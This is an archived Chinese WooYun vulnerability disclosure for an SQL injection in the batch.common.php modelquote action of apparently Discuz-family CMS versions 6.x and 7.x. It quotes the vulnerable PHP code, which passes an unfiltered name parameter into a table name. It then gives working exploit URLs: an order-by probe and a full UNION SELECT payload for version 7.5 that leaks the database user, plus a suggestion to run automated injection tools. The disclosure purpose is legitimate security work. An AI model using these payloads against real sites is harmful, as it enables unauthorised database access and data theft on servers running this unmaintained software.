乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-24: 细节已通知厂商并且等待厂商处理中 2014-10-24: 厂商已经确认,细节仅向厂商公开 2014-10-27: 细节向第三方安全合作伙伴开放 2014-12-18: 细节向核心白帽子及相关领域专家公开 2014-12-28: 细节向普通白帽子公开 2015-01-07: 细节向实习白帽子公开 2015-01-22: 细节向公众公开
1
试了6.x 7.x 其他版本没测试, 应该也行的、
batch.common.php (218) :02} elseif ($action == 'modelquote') {03 04 //模型评论引用05 $name = empty($_GET['name'])?'':trim($_GET['name']); //无过滤06 $cid = empty($_GET['cid'])?0:intval($_GET['cid']);07 $html = false;08 if(!empty($name) && !empty($cid)) {09 $item = array();10 $query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=\''.$cid.'\''); //tname处理 然后带入11 if($item = $_SGLOBAL['db']->fetch_array($query)) {12 $item['message'] = preg_replace("/<blockquote.+?<\/blockquote>/is", '',$item['message']);13 $html = '[quote]'.$blang['from_the_original_note'].$item['author'].$blang['at'].sgmdate($item['dateline']).$blang['released']."\n".cuthtml($item['message'], 100).'[/quote]';14 showxml($html);15 }16 }17 showxml($html);18 19}
在看看tname函数:
function/common.func.php (601) :02function tname($name, $mode=0) {03 global $_SC;04 if($mode == 1) {05 return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`';06 } elseif ($mode == 2) {07 return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`';08 } else {09 return $_SC['tablepre'].$name;10 }11}
依然没有过滤、接下来就可以开始注入了、exp如下、
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] #
这个后面可以直接order by了
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #
由于版本不同, 所以字段数不一样, 建议先orderby判断下来, 比如7.5的, 就是21个字段, 直接丢个7.5的exp吧
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C7996474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
当然你也可以直接配置好以后丢工具来跑:
使用safe3不是很好、可以换种工具测试、
Discuz官方是不是可以送些小礼物、、、
危害等级:高
漏洞Rank:20
确认时间:2014-10-24 09:26
该产品已经停止维护,感谢您的关注。
暂无